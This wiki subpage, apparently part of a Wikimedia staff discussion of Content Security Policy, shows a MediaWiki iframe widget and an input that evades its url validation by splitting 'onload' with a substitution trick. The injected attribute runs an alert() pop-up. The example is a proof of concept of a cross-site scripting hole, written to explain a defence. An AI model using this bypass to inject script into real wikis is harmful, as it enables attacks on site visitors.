User:BWolff (WMF)/CSP/4
< User:BWolff (WMF) | CSP
Example
editFor example:
The iframe widget is defined as:
<includeonly><iframe src="<!--{$url|validate:url}-->" style="border: <!--{$border|escape:html|default:0}-->" width="<!--{$width|escape:html|default:400}-->" height="<!--{$height|escape:html|default:300}-->"></iframe></includeonly>
If we have the wiki-code
{{#widget:iframe|width=0|height=0|url=https://example.com/"onl{{safesubst:ns:0}}oad="alert('All\40your\40base\40are\40belong\40to\40us')}}
Results in the HTML:
<p><iframe src="https://example.com/"onload="alert('All\40your\40base\40are\40belong\40to\40us')" style="border: 0" width="0" height="0"></iframe>
</p>
Which causes All your base are belong to us to show up in a pop-up box.